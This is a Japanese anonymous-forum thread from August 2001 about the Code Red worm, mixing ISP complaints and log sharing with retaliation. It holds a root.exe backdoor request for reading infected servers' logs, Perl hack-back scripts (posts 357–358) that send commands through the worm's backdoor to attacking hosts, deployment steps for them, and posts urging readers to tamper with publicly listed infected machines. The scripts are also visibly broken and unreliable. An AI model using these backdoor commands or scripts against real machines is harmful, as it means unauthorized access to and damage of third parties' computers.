322名無しさん@お腹いっぱい。:2001/08/11(土) 14:43
>>319
Proxyサーバに管理者がログを請求して入手できれば特定される。
323名無しさん@お腹いっぱい。:2001/08/11(土) 14:45
それに、telnetって串とーせんの?(俺よーわからん)
324 :2001/08/11(土) 14:46
じゃあクリックしないほうが良いってことですね

お世話様でした。
325323:2001/08/11(土) 14:46
あ、port80にtelnetか
326名無しさん@お腹いっぱい。:2001/08/11(土) 14:47
>>324
ねっとかふぇいってらっさい
327名無しさん@お腹いっぱい。:2001/08/11(土) 14:51
バックドアから侵入したきた奴のIPを晒すスレとかあったら
有意義かもしれないなあ。
328え〜ん:2001/08/11(土) 14:52
>>319
進入→即フォマト→標的「またハングかゴラァァ・・ガチャガチャ」→標的しばし呆然(??)→1時間後プロバの電話番号やっと見つける→「ログよこせゴラァァ→プロバいまそれどころじゃないんじゃい!→ログ流れ
こんな感じ?
329 :2001/08/11(土) 14:53
ネットカフェというてがあったんですね。

チャットでカフェからやってる人に頼んでみます
330sage:2001/08/11(土) 14:54
>>299

tableタグ閉じわすれだよ。NNで見えないよ。くそ、ワームまでIE用か
331名無しさん@お腹いっぱい。:2001/08/11(土) 14:54
フォーマットはアドミニストレーター権限ないと出来ないと
思われ。ログファイルもプロセスがロックしてるから消えないと
思われ。
332299:2001/08/11(土) 14:56
>>330
あ、俺もNNでみれんかった。
きっと意図的なんだろーな。。。
333 :2001/08/11(土) 14:57
>>299をクリックしたらバックドアに感染したんですけど・・・
334名無しさん@お腹いっぱい。:2001/08/11(土) 14:58
>>329
 よしなさいって。どうしても覗き欲求を満足させたいなら、
http://www.inpaku.ntt-west.co.jp/mutsu/tayori/live/index.html
 から、可愛い小犬の様子でも覗きなさい。
335名無しさん@お腹いっぱい。:2001/08/11(土) 14:58

IIS と同じ権限が取れるよ。
アドミンで動かしてたら、アドミンになれる。

普通アドミンじゃないの?
336名無しさん@お腹いっぱい。:2001/08/11(土) 14:59
>>328
進入→即フォマト→標的メーカーサポートへ「パソコンが壊れた。早く直さんかいゴラァァ」
以上繰り返し。
こっちの方が多そう。
337え〜ん:2001/08/11(土) 15:00
>>335
確かに、普通の人はインストールと遊びを分けてない。
338名無しさん@お腹いっぱい。:2001/08/11(土) 15:00
もぢらは見れたが
339え〜ん:2001/08/11(土) 15:02
>>336
そうだな、そういえば。
漏れ、メーカーに電話したことないからな。
340名無しさん@お腹いっぱい。:2001/08/11(土) 15:03
>> 331 335

このバグ↓ついているんだから、アドミンになれる。
http://www.zdnet.co.jp/news/0106/19/e_iisflaw.html

セキュリティパッチあてないドキュソ管理者だもん。
全部デフォルト、デフォルト。
341 :2001/08/11(土) 15:04
>>299をクリックしたらバックドアがどうとかって
ノートンが反応したんですけど
どういうことですか?

なんか大変なことになっています
342名無しさん@お腹いっぱい。:2001/08/11(土) 15:05
その前に、稼働中のシステムの入ったパーティションってフォーマット出来るの?
はじかれそうだけど。
343名無し:2001/08/11(土) 15:07
80にConnectしてきたら
GORAa!GORAa!GORAa!GORAa!........GORAa!GORAa!GORAa!GORAa!
ってSendしてもいいですか?
344え〜ん:2001/08/11(土) 15:07
>>341
壁越しにクリックしてる?せめて80、137〜139、443はふさいでね。
345え〜ん:2001/08/11(土) 15:10
>>342
やっぱ自分ので実験してみるか。
346名無しさん@お腹いっぱい。:2001/08/11(土) 15:10
自動報復装置(ARS)内蔵かもね。古い...
347名無しさん@お腹いっぱい。:2001/08/11(土) 15:13
>>342
formatじゃなくてfdisk(NTにある?)でパーティーション解除とか。
348名無しさん@お腹いっぱい。:2001/08/11(土) 15:18
wipe.com・・・
349名無しさん@お腹いっぱい。:2001/08/11(土) 15:20
>>341
うちは特になんともないけど。NISも何も警告だしてないし、
ログも普通。
350名無しさん@お腹いっぱい。:2001/08/11(土) 15:23
とろいが動く条件には MS00-052 も関係なかったっけか?
それもリブトの後にアドミンがろぐいん?
351336:2001/08/11(土) 15:42
結局赤虫とは関係無いパソコンメーカーサポートにも赤虫被害は進行していくのでした。
352無限晒し:2001/08/11(土) 15:53
/scripts/root.exe?/c+echo+Content-Type:+text/plain&&echo.&&type+\winnt\system32\logfiles\w3svc1\ex010811.log
353名無しさん@お腹いっぱい。:2001/08/11(土) 16:02
>>352
またそうやって晒す
普通の人はログの置き場所知らないんだから。
354名無しさん@お腹いっぱい。:2001/08/11(土) 16:16
>>346
はやく停めにゆかなきゃ。
ネーレイドはまだ稼動状態にあるかな?
355341:2001/08/11(土) 16:26
気持ち悪いからOSフォーマットしてきました。
確かにバックドアが入ってきましたよ
警告がバンバン来ましたし>>349
356え〜ん:2001/08/11(土) 16:36
>>345
実験結果 やっぱやばいっす、しゃれになりまへん。
357たぶん動くと思うよ:2001/08/11(土) 16:55
#! /usr/bin/perl
$postmes = '/scripts/root.exe?/c+dir+"c:\"';
$useragent = 'anti akamusi 072';
use Socket;$sockaddr = 'S n a4 x8';
($na,$al,$prt) = getprotobyname('tcp');
($na,$al,$type,$len,$hostaddr)=gethostbyname($target);
$iis=pack($sockaddr,2,80,$hostaddr);
socket(IIS,AF_INET,SOCK_STREAM,$prt);
connect(IIS,$sock);select(IIS);$|=1 ;
print IIS "\r\n";
if(!$u){print IIS 'GET default.ida?HAYAKUTAIOUSIROBAKA.FUCKIN.IIS.ADMIN HTTP/1.1\r\n";}
else{print IIS "GET $postmes HTTP/1.1\r\n";}
print IIS "User-Agent: $useragent\r\n";
print IIS "Accept: */*\r\n";
close(HTTP);exit;
358鬱だ途中だった...:2001/08/11(土) 16:59
#! /usr/bin/perl
$postmes = '/scripts/root.exe?/c+dir+"c:\"';
$useragent = 'anti akamusi 072';
$target = $ENV{'REMOTE_ADDR'};
use Socket;$sockaddr = 'S n a4 x8';
open(RED,">>codered.txt");
($na,$al,$prt) = getprotobyname('tcp');
($na,$al,$type,$len,$hostaddr)=gethostbyname($target);
$iis=pack($sockaddr,2,80,$hostaddr);
socket(IIS,AF_INET,SOCK_STREAM,$prt);
connect(IIS,$sock);select(IIS);$|=1 ;
print IIS "\r\n";
if(!$u){ print IIS 'GET default.ida?HAYAKUTAIOUSIROBAKA.FUCKIN.IIS.ADMIN HTTP/1.1\r\n";}
else{print IIS "GET $postmes HTTP/1.1\r\n";while(<IIS>{print RED;}}
print IIS "User-Agent: $useragent\r\n";
print IIS "Accept: */*\r\n";
close(HTTP);exit;
359名無しさん@お腹いっぱい。:2001/08/11(土) 17:10
>>299のってCode Redだったのか・・・
俺の所は7月9日に61.24.3.135からport53を叩かれて、httpで開いてみたらまさにコレだったんだよ
その頃のport80叩きって、まだ3日に1回有るか無いかなんだけど、もう出回ってたってことなんだな
360名無しさん@お腹いっぱい。:2001/08/11(土) 17:27
sadmindって可能性もあるんじゃないかな。
361349:2001/08/11(土) 17:45
>>355

たしかにブラウザのキャッシュをNAVでスキャンすると
sadmindが検出されますね。でも引っかかったファイル
ただのhtmlにしか見えないんだけど。
362名無しさん@お腹いっぱい。:2001/08/11(土) 17:45
363349:2001/08/11(土) 17:53
>>355
http://www.sarc.com/avcenter/venc/data/backdoor.sadmind.html
↑ここに情報が。
要するに、NAVが「Backdoor.Sadmind.Dr」を検出したと報告するの
は、あなたが感染したのではなく、感染したwebsiteにアクセスし
たという意味である由。
364名無しさん@お腹いっぱい。:2001/08/11(土) 18:06
>>362
 やられたのが自分のサイトなら
 ファイルが書き換えられている->sadmind
 ファイルは書き換えられてないけどアクセスすると
 内容が書き換えられている->code red
って事なんだろうね。
365名無しさん@お腹いっぱい。:2001/08/11(土) 18:14
相手に注意のディレクトリ作ってやったんだが、
やっぱログファイルけしたほうがいいかな?
366名無しさん@お腹いっぱい。:2001/08/11(土) 18:14
やっぱ消しちゃあかんな。やめとこ。
367名無しさん@お腹いっぱい。:2001/08/11(土) 18:15
多分消せないと思われ。
つーか、やるなよ。
368名無しさん@お腹いっぱい。:2001/08/11(土) 18:19
相手がPPPの場合、時間が経ってると別人の可能性もある。
369名無しさん@お腹いっぱい。:2001/08/11(土) 18:29
別人にしても、あの手法でアクセスできるのなら、
同じだと思われ。
370名無しさん@お腹いっぱい。:2001/08/11(土) 18:30
そういや、そうだね。
371名無しさん@お腹いっぱい。:2001/08/11(土) 18:31
そして、不法アクセス失敗のログが残ると。
372名無しさん@お腹いっぱい。:2001/08/11(土) 18:32
>>371
 別人なら。
373名無しさん@お腹いっぱい。:2001/08/11(土) 18:32
感染しているようなサーバーって、ことごとくNETBIOSも通ってるな・・・
信じられねー。
374名無し:2001/08/11(土) 18:34
ログから逮捕だって。
375名無しさん@お腹いっぱい。:2001/08/11(土) 18:35
NETBIOS通るなら直接Net Sendも出来る?
376gt;:2001/08/11(土) 18:37
日本でいうと、旧郵政省みたいな所から、、。
日本だと、ニュースになっちゃうね。

person: Xu Yongzhong
address: Data Communication Bireau
address: Ministry of Posts and Telecommunications
address: A12 Xin-jie-kou-wai Street
address: Beijing 100088
country: CN
phone: +86-10-62053991
fax-no: +86-10-62053995
e-mail: [email protected]
nic-hdl: XY1-AP
mnt-by: MAINT-NULL
changed: [email protected] 19960319
source: APNIC
377名無しさん@お腹いっぱい。:2001/08/11(土) 18:38
バックドア使わないでNet Sendで警告送れれば一番良いと思うんだけどなあ。
378名無しさん@お腹いっぱい。:2001/08/11(土) 18:48
現在攻撃続行中でメモリ中にCodeRedIIが生きている状態のIISって
HTTPログが残らないんじゃネーノ?
379名無しさん@お腹いっぱい。:2001/08/11(土) 18:59
残るって説と残らないって説があるらしいね。
http://www.reasoning.org/jp/security_alerts/hashsa-2001-02.html#packet
380名無しさん@お腹いっぱい。:2001/08/11(土) 19:09
NTならバックドアが作成されないし、
2000 Server/Proだと故意感染させたPC(内->外のTCP80を抑止)
にはやはりHTTPログは残存しないな。
感染直後でとまってる。
381名無しさん@お腹いっぱい。:2001/08/11(土) 19:12
>>294
50匹ほどバイナリを比較しましたが新亜種は無かったよ。
全部ノーマルXXXだったよ。
382名無しさん@お腹いっぱい。:2001/08/11(土) 19:15
>>380
それは良い事を聞いた(藁
383名無しさん@お腹いっぱい。:2001/08/11(土) 19:22
一度でもリセットされると再感染まではログは
残る。まあ今の状態なら、5分もつないでればダイアル
アップだろうがPHSだろうがヤラれてしまうので
こっちのログに残ったXXXXのアドレスにちょっかい
出してる分にはゴニョゴニョ...。
日本国内のはやめといたほうがゴニョゴニョ...。
384\hearts;:2001/08/11(土) 19:22
>>294
すみません。設置方法を教えてくださいませんか?
当方WinNT4svr ApacheとPerlは入ってます。
385名無しさん@お腹いっぱい。:2001/08/11(土) 19:27
アルファネット痛すぎ(w
よっぽど苦情がきてると思われ(w

アルファインターネット会員様各位
                          平成13年8月10日
=======================================================
新種ウイルス「CODERED」(コードレッド)及び亜種ウイルスの
感染チェック・駆除の再徹底について
=======================================================
日頃はアルファインターネットをご利用頂き有難う御座います。
8月8日に新種ウイルス「CODERED」(コードレッド)の警告と
感染チェック、駆除についてメールさせて頂きました。
残念ながら、「感染会員からのアタック被害」告知が減少しておりません。
今回の被害により、「警察への被害届」を提出されたケースが複数件発生しております。
他人事ではなく、ご自身が加害者である可能性がある事を
再認識して頂き、早急な「感染チェック、駆除」の再徹底をお願い致します。
特に法人様が感染し、アタックを知らない間にかけていた場合、
法人の信用問題にも発展しかねませんので、対応が必要です。

前回のメール同様、もし感染が確認された場合は
「完全駆除が終了・安全確認」されるまで「ネットワークへの接続は停止」
させて頂きますので予めご了承下さい。
386え〜ん:2001/08/11(土) 19:29
やっと仕事終わった
387え〜ん:2001/08/11(土) 19:33
>>382
2000proはローカルセキュリティポリシーでログオンイベントを有効にしないと
残らないと思ったが。
388え〜ん:2001/08/11(土) 19:34
駄レスですまん。
全部読んでなかった。
389うえーん:2001/08/11(土) 19:37
So-net内から、打ち込まれてるよー。
ディレクトリ丸みえだよー。
今度きたら、ここでIP晒したろ。
390名無しさん@お腹いっぱい。:2001/08/11(土) 19:38
>>384
説明する程たいそうな物じゃないよ。スクリプトをDocumentRootにdefault.idaって名前で置いて
#!/usr/local/bin/perl
1行目のこれ↑を適当に書き換え。.htaccessに次の1行追加
AddType application/x-httpd-cgi .ida
空ファイルCodeRed.logを書きこみ可で作成。
391名無しさん@お腹いっぱい。:2001/08/11(土) 19:39
>>385
つーかさー、客にお願いする前にISPがフィルタするべき話
なんじゃネーノ?と思ってしまうが。
*.krからのアクセスをdeny設定してくれりゃそれでいいよ。
392名無しさん@お腹いっぱい。:2001/08/11(土) 19:40
>>385
>法人の信用問題にも発展しかねませんので、対応が必要です。
この辺が痛いね。相当絞られたんだろう。
393名無しさん@お腹いっぱい。:2001/08/11(土) 19:41
>>391
ユーザの中には在日も居ると思われ。
394名無しさん@お腹いっぱい。:2001/08/11(土) 19:42
>>393
国家賠償責任つーことで。奴らそういうの得意じゃん。
395名無しさん@お腹いっぱい。:2001/08/11(土) 19:43
>>391
>前回のメール同様、もし感染が確認された場合は
>「完全駆除が終了・安全確認」されるまで「ネットワークへの接続は停止」
>させて頂きますので予めご了承下さい。
アルファだから叩きたいんだろうけど、プロバイダーとしては
結構踏み込んだ内容で、僕は評価する。
396名無しさん@お腹いっぱい。:2001/08/11(土) 19:47
「だれでも簡単接続〜」
なんていって素人客集めて、ヤレこんな事態になったら
急に客にセキュリティ保持義務を押し付けるのもどうか、
ってことよ。
アルファだから、ってのは全然意識してない。
オレんとこのISPはフィルタどころか通知さえこない。
隣人からのアタックも途絶える気配なしだ。
397名無しさん@お腹いっぱい。:2001/08/11(土) 19:51
そー言えばおれんとこ朝日ネットだが何の注意喚起もないなぁ。
398名無しさん@お腹いっぱい。:2001/08/11(土) 19:54
>>396
WinMeとか使うしか。よんど気に入らなきゃHDDフォーマットした上でISP換えれば吉。
399ななしさん:2001/08/11(土) 19:55
400名無しさん@お腹いっぱい。:2001/08/11(土) 19:56
>>398
いや別にオレのPCには被害はないんだが。
401名無しさん@お腹いっぱい。:2001/08/11(土) 19:57
実効効率としちゃISPのルータにACLぶちこむのが
一番妥当で事態収拾の近道だと思うよ。
402 :2001/08/11(土) 19:58
So-net内からの赤虫アタックって
これまで、無かったんだけどなー。

FWIN,2001/08/11,19:42:49 +9:00 GMT,210.132.232.126:3372,210.139.218.XXX:80,TCP (flags:S)
FWIN,2001/08/11,19:59:16 +9:00 GMT,210.117.85.149:3456,210.139.218.XXX:80,TCP (flags:S)
FWIN,2001/08/11,19:59:18 +9:00 GMT,210.101.100.106:1263,210.139.218.XXX:80,TCP (flags:S)
FWIN,2001/08/11,20:01:21 +9:00 GMT,210.139.99.187:3722,210.139.218.XXX:80,TCP (flags:S)
403名無しさん@お腹いっぱい。:2001/08/11(土) 19:58
>>396
約款にちゃんと自己責任て書いてあるべよ。と議論しても始まらないが。
アクセス制限の件、感染者のみ接続制限してるのなら、ヨイと思う。
他のお客さんにも迷惑がかかるし、客同士で注意するのが大変だから店員が
注意するのがフツーであり、注意も聞き入れない客は退場。by飲み屋の法則。
404名無しさん@お腹いっぱい。:2001/08/11(土) 20:00
そこ、異常に遅くて読めないのは何故だろう。
多分CでNet Sendしてあげる奴だと思うけど、あて先はマシン名じゃないと
いけないからlocalhostじゃ届かない場合があると思う。
405名無しさん@お腹いっぱい。:2001/08/11(土) 20:01
>>401
そうかもしれんが、実際は難しいと思う。
それをやってしまうと、もう二度と外せない。
一番効果的なインターネットエクスチェンジで、
観測も対処も出来たんだろうが。してしまうとねぇ。
406名無しさん@お腹いっぱい。:2001/08/11(土) 20:02
>>399
たぶん>>358に手を加えればそっくり出来るよ。
407名無しさん@お腹いっぱい。:2001/08/11(土) 20:03
>>403
感染者の接続制限はいいんでないの?きめ細かい対応だと思うよ。
飲み屋の例えでいうと、もはや飲み屋で大火事なわけさ。
ルータのdeny設定がそんなに手間のかかることとは思えないし
外部からガンガンにアタックパケットが流入している状態を
ISPのADMINは一体どう考えて放置してんのか、ってこと。
408名無しさん@お腹いっぱい。:2001/08/11(土) 20:06
>それをやってしまうと、もう二度と外せない。
はあ?ネットワーク系の仕事は長いけれど
そんな話は初耳だが。収まるまでの時限措置でいいだろ。
409名無しさん@お腹いっぱい。:2001/08/11(土) 20:07
>>408
なんで収まるんだよ。フィルタリングで感染しなかったということは、
感染対象ホストがまだいっぱいある状態ってことだろ。
410名無しさん@お腹いっぱい。:2001/08/11(土) 20:07
>>395

>アルファだから叩きたいんだろうけど、プロバイダーとしては
>結構踏み込んだ内容で、僕は評価する。

激しく同意
安いかろう悪かろうみたいによく言われてるけど
ちょっとした質問とかで電話しても話がはやいとこが好きなんだ。
D○ONなんかまるっきり話が通じねーもん
D○ONのねーちゃん pop before smtp くらい知ってろよ、ってかんぢ(藁
411名無しさん@お腹いっぱい。:2001/08/11(土) 20:12
>>409
確かにそうかもね。ただ、感染してるのを取り除いてやるのはISPの責任ではない。
あと、CodeRed I/IIに限れば期間限定Wormなので期限付き対策が有効。
412名無しさん@お腹いっぱい。:2001/08/11(土) 20:12
>>409
あんた今回の状況わかっていってる?
ダイアルアップでWin2KPro使ってる素人ユーザは、
自分が感染していることすら気づいてないんだぜ。
感染対象ホストが大量にあるのはその通りで、
フィルタ掛けてそいつらが毎晩再感染して他を攻撃して
しまうのを防止するほうが重要だろう。
「外部」からの攻撃が収まるまではACL設定しろって
いってんだよ。
413名無しさん@お腹いっぱい。:2001/08/11(土) 20:13
>>411
亜種が出なければな。
414名無しさん@お腹いっぱい。:2001/08/11(土) 20:14
>>412
またーりしろよ。
415名無しさん@お腹いっぱい。:2001/08/11(土) 20:14
>>412
だから、俺が言ってるのは、感染してるユーザのアカウントを停止
すべきだって言ってるんだよ。
これだって、不必要に人に迷惑かけているんだけど。
それ以上誰かに頼るなよ。
416名無しさん@お腹いっぱい。:2001/08/11(土) 20:15
>>413
感染してる人は、無期限に塞ぐか、接続断。これ自業自得、ということで(藁。
>>414
まったく尿意。
417名無しさん@お腹いっぱい。:2001/08/11(土) 20:16
ウチにアタックしてきたIPをのぞいてみたら
TOPに
fuck china government fuck poizonbox
って出たが、これはなに?
なんかやばかった?
418名無しさん@お腹いっぱい。:2001/08/11(土) 20:16
>>412
外部からの攻撃が終わったら、今度は内部から攻撃することに
なるだろうボケ!!
419名無しさん@お腹いっぱい。:2001/08/11(土) 20:16
>>406
すぐできるものなのかな?
俺にはできないから誰か書いてくれないかなー
420名無しさん@お腹いっぱい。:2001/08/11(土) 20:17
>俺が言ってるのは、感染してるユーザのアカウントを停止
>すべきだって言ってるんだよ。

412だけどこれには反対してないよ。
ただそれだけのもぐらたたきじゃいつまでたっても
混乱は止まらん。
421名無しさん@お腹いっぱい。:2001/08/11(土) 20:17
>>418
またーりしろ(゚д゚)ゴルア
422名無しさん@お腹いっぱい。:2001/08/11(土) 20:18
>>418
なるほどそれでかみ合っていないと思われ。警告メールを送って、メールしか読み書きできないように
塞いでしまえばよいのである。
ていうか、なんでけんか腰になるのか理解できない・・・
423名無しさん@お腹いっぱい。:2001/08/11(土) 20:19
>外部からの攻撃が終わったら、今度は内部から攻撃することに
>なるだろうボケ!!
マターリしろよ。(笑
*.krの抑止だけで数が圧倒的に減るちゅーに。
自分のW2Kで試してみな。
424名無しさん@お腹いっぱい。:2001/08/11(土) 20:19
>>397
おれの仕事仲間がWin2K使ってるんだけど
朝日から昨日通知きたって言ってたよ。
もちろん彼は感染者だったんだけど(w
で、おれに相談してきたからここの事をメールしておいた。
425422:2001/08/11(土) 20:20
ていうかむしろ、やっぱりどうにかしてくれ *.kr のほうが深刻だろう。
CodeRed I/IIでもそうだが、今後もやっぱり信用できないと思われ。
426名無しさん@お腹いっぱい。:2001/08/11(土) 20:21
減ってきました。
皆さんはどうですか?
427名無しさん@お腹いっぱい。:2001/08/11(土) 20:22
全然減ってない。
428名無しさん@お腹いっぱい。:2001/08/11(土) 20:22
>>424
対象毎にメールしてるのね。
感染してなくてよかった。
429名無しさん@お腹いっぱい。:2001/08/11(土) 20:22
>>426
お盆休みで日本人がPCの電源入れてないだけかも?
430424:2001/08/11(土) 20:24
>>428
うん。誰か朝日にチクッたらしい。
本人落ち込んでた(w

っつーか、やっぱ気付いてない人多いよね。
431全く:2001/08/11(土) 20:25
同じペースで、アタック来てるので、
減ってるとは感じないね。
432名無しさん@お腹いっぱい。:2001/08/11(土) 20:27
昨日と比べると1時間あたり5匹弱は減ってるかな。
それでもやっぱり多いけど。
433名無しさん@お腹いっぱい。:2001/08/11(土) 20:31
最近のJPドメインは
.ppp.infoweb.ne.jpと.ocn.ne.jpと.nava21.ne.jpがウザイ。
ちなみに61系です。
434名無しさん@お腹いっぱい。:2001/08/11(土) 20:36
>>417
>ウチにアタックしてきたIPをのぞいてみたら
>TOPに
>fuck china government fuck poizonbox

軒並みそうなってるよ。改竄屋には入れ食い状態だってことだろ。
435名無しさん@お腹いっぱい。:2001/08/11(土) 20:36
[email protected]
ホスト名と時間を添えて
436 :2001/08/11(土) 20:56
http://www.security.nl/misc/codered-stats/
このアタックの減少傾向って、赤虫の性質なのか
それとも、パッチ当てるとか対策のおかげなのか
どっちなのかねー。
437名無しさん@お腹いっぱい。:2001/08/11(土) 21:03
すみまsつえん
code red って誰がつけた名前なん?
438login:名なしさん:2001/08/11(土) 21:03
New Version でた。

http://www.oresama.org/default.ida

ワラたよ。
439名無しさん@お腹いっぱい。:2001/08/11(土) 21:09
440名無しさん@お腹いっぱい。:2001/08/11(土) 21:09
>>438
俺はエロ画像を表示させてる
まだ誰も画像を読み込んでないけどね
441名無しさん@お腹いっぱい。:2001/08/11(土) 21:10
>>436
日付をよくみろ。
442名無しさん@お腹いっぱい。:2001/08/11(土) 21:11
あ、下のグラフか。たしかに減ってるな。
443名無しさん@お腹いっぱい。:2001/08/11(土) 21:13
>>437
このスレで誰か解説してたよ。
444名無しさん@お腹いっぱい。:2001/08/11(土) 21:16
感染マシンはご近所IPからアタックするんですよね?
だから、うちはinfowebなのでinfoweb会員の感染マシンが一番多いです。

niftyサポートからまともなメールが奇跡的に帰ってきました。
規約に沿って、私が送ったログから感染会員を割り出し警告するそうです。
445384:2001/08/11(土) 21:25
>>390
ありがとうございます。さっそくやってみます。
446しみじみクン:2001/08/11(土) 22:00
ところで…
一日に二度も、しみじみ語っていいですか…

今回の騒ぎは、企業がお盆休みに入ったこともあり、いわゆる企業のサーバーの
感染というのは、一段落ついたのでは…などと勝手に判断しています。それにひ
きかえ、いつまでたっても収まらず、悲しいのは、個人のWin2KProユーザーでは
ないかと…

こんな事を想像してしまいました…「お盆休みで、孫たちが帰ってくる田舎のお
じいちゃんおばあちゃん、おじいちゃんは孫のユウスケ君(6歳)、サツキちゃ
ん(4歳)によろこんでもらおうと、最新のパソコン(Win2KPro搭載)を購入し
て、インターネットが見れるよう準備していました。8/11、夜、おじいちゃんは
ユウスケ君と一緒に、世界中のホームページを見ていました…「おじいちゃん、
すごいね!」ユウスケ君はすごくたのしそうです、夜遅く、二人は寝ました…

次の日の朝、おじいちゃんはさっそくパソコンのスイッチを入れました。ユウス
ケ君は「おじいちゃん、早く、早く!」と興奮しいています…ところが、パソコ
ンが起動すると、そこには、「FUCK USA GOVERMENT!」と表
示されています!(あるいは女子高生バックリ画像)「おじいちゃん、なにこれ
?なんだか怖い…」妹のサツキちゃんもツインテールの髪型で目をこすりながら
不安そうに見ています。おじいちゃんもいったい何が起きたのかわからず、青ざ
めています。

…なんていう楽しいお盆の家庭をぶちこわすようなことがなければいいのですが
…と思っています。
447名無しさん@お腹いっぱい。:2001/08/11(土) 22:15
>>446
企業サーバーは、たいてい固定IPだからCode Red騒動の初期に被曝している
と思われる。
448うげ:2001/08/11(土) 22:17
Code Red Warning
Code Red Warn is a script that tries to address the main problem with the Code Red worm,
being that most people don't know they've been hit. It does this by watching Apache logfiles, and sending a "You've been hit" e-mail when a Code Red infected site first sends an attack.
http://jonathanscorner.com/etc/coderedwarn/
449名無しさん@お腹いっぱい。:2001/08/11(土) 22:18
Fuck USA Goverment!
画面をみた、おじいさんはいいました。
ほぉ、すごいねえ、これはNASAに繋がってしまったんだねえ。
世界は繋がっているんだねえ。

あるいは、「女子高生バックリ画像」が表示されている
のを見た、ゆうすけ君はきっぱりと、
おじいちゃん、ボクにまかせてと言うと、
パソコンのキーボードをぱちぱちと打ち始めました。
やがて画面には素敵な男女がくんずほぐれずの動画が表示され
ました。
ゆうすけ君はしたり顔で言います。これからはブロードバンド
の時代だからね、これぐらいのじゃないとつまらないよ。
なるほどのぉ、時代の流れとはこういうものかのお。
と、お爺さんは感心するばかりでした。
450名無しさん@お腹いっぱい。:2001/08/11(土) 22:34
コードレッドさん、もっともっと暴れてくれよ。
こんなものでおさまっちまうのかい?

もっと楽しませてくれよ、たのんだよ。
451名無しさん@お腹いっぱい。:2001/08/11(土) 22:38
452名無しさん@お腹いっぱい。:2001/08/11(土) 22:38
453名無しさん@お腹いっぱい。:2001/08/11(土) 22:38
454名無しさん@お腹いっぱい。:2001/08/11(土) 22:38
455名無しさん@お腹いっぱい。:2001/08/11(土) 22:39
456名無しさん@お腹いっぱい。:2001/08/11(土) 22:39
457名無しさん@お腹いっぱい。:2001/08/11(土) 22:54
株式会社オープンアカウントって会社のサーバーからCode Redの
アクセスがあった。
ホントにオープンなんですねぇ・・・。
458名無しさん@お腹いっぱい。:2001/08/11(土) 22:57
みんな飽きてきたみたい。
459名無しさん@お腹いっぱい。:2001/08/11(土) 23:00
はっきりいって、マスコミの報道は無い方がましだよ・・・
460え〜ん:2001/08/11(土) 23:01
もうあきたよね、ログ見るのもうんざり。
昼にも書いたけど某国営放送にお返事メール送ったyo
461名無しさん@お腹いっぱい。:2001/08/11(土) 23:03
放送日時決まったら教えてね。観るから。
462名無しさん@お腹いっぱい。:2001/08/11(土) 23:12
DNSの設定変えたら変なログが残るようになった。
これって感染者のディレクトリ?

[2001/08/11 18:49:59] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 19:08:34] CodeRed Type XXXXX from: ***.***.***.*** / SNOWFOX
[2001/08/11 19:08:46] CodeRed Type XXXXX from: ***.***.***.*** / HOME733ENG
[2001/08/11 19:22:41] CodeRed Type XXXXX from: ***.***.***.*** / CCDHOME
[2001/08/11 19:25:27] CodeRed Type XXXXX from: ***.***.***.*** / KAWAI
[2001/08/11 19:27:05] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 19:32:47] CodeRed Type XXXXX from: ***.***.***.*** / CCDHOME
[2001/08/11 19:52:47] CodeRed Type XXXXX from: ***.***.***.*** / KAWAI
[2001/08/11 20:02:10] CodeRed Type XXXXX from: ***.***.***.*** / JAPAN
[2001/08/11 20:06:09] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 20:17:34] CodeRed Type XXXXX from: ***.***.***.*** / NT2000SERVER
[2001/08/11 20:24:17] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 20:44:05] CodeRed Type XXXXX from: ***.***.***.*** / HY
[2001/08/11 20:51:42] CodeRed Type XXXXX from: ***.***.***.*** / NT2000SERVER
[2001/08/11 20:53:31] CodeRed Type XXXXX from: ***.***.***.*** / MEGURO1
[2001/08/11 21:05:22] CodeRed Type XXXXX from: ***.***.***.*** / MEGURO1
[2001/08/11 21:06:22] CodeRed Type XXXXX from: ***.***.***.*** / NT2000SERVER
[2001/08/11 21:09:21] CodeRed Type XXXXX from: ***.***.***.*** / HOME733ENG
[2001/08/11 21:10:08] CodeRed Type XXXXX from: ***.***.***.*** / HY
[2001/08/11 21:19:09] CodeRed Type XXXXX from: ***.***.***.*** / QOO
[2001/08/11 21:25:38] CodeRed Type XXXXX from: ***.***.***.*** / SNOWFOX
[2001/08/11 21:34:34] CodeRed Type XXXXX from: ***.***.***.*** / MIKAMI_NOTE
[2001/08/11 21:43:58] CodeRed Type XXXXX from: ***.***.***.*** / IS~MIKAMI_NOTE
[2001/08/11 21:46:59] CodeRed Type XXXXX from: ***.***.***.*** / NT2000SERVER
[2001/08/11 22:02:08] -- error -- from: ***.***.***.*** /
[2001/08/11 22:04:47] CodeRed Type XXXXX from: ***.***.***.*** / VIP120
[2001/08/11 22:09:44] -- error -- from: ***.***.***.*** /
[2001/08/11 22:22:22] -- error -- from: ***.***.***.*** /
[2001/08/11 22:28:13] CodeRed Type XXXXX from: ***.***.***.*** / IS~C1XF
[2001/08/11 22:39:27] CodeRed Type XXXXX from: ***.***.***.*** / CONN-HD
463名無しさん@お腹いっぱい。:2001/08/11(土) 23:20
なにをしたのか分からんけど、コンピュータの音とバイオス名
ぽいね。
464名無しさん@お腹いっぱい。:2001/08/11(土) 23:27
フロピーガコガコさせても全然気付いてくれない

CGI Error
The specified CGI application misbehaved by not returning a complete set of HTTP headers.
The headers it did return are:
The device is not ready.
465462:2001/08/11(土) 23:27
>>463
ログを取ってるマシンのDNSサーバーをローカルのBind DNSCashOnlyに変更しました。
それからログの中のの同じ名前のところは同一のIPです。
466名無しさん@お腹いっぱい。:2001/08/11(土) 23:27
467名無しさん@お腹いっぱい。:2001/08/11(土) 23:31
http://takuomix.homeip.net/
今日は気分が悪い。
CodeRed野郎を大公開。
FDガコガコでもdelでもやってやってくれ。

お好きなようにどうぞ。(セルフサービス)藁
468名無しさん@お腹いっぱい。:2001/08/11(土) 23:34
>>466
Topページはココかな?
http://www2.alec.ac.jp/
469名無しさん@お腹いっぱい。:2001/08/11(土) 23:39
フロッピーがこがこ。

気づく

変だ。リブート。

またガコガコする。

壊れちゃったかな。再インストール。

パッチ当たってない

(上から永久ループ)
470467:2001/08/11(土) 23:40
471名無しさん@お腹いっぱい。:2001/08/11(土) 23:52
やべぇ、フロッピーが入ってた(w
472名無しさん@お腹いっぱい。:2001/08/11(土) 23:58
>>469
激しくありそうな話だ。
473名無しさん@お腹いっぱい。:2001/08/12(日) 00:13
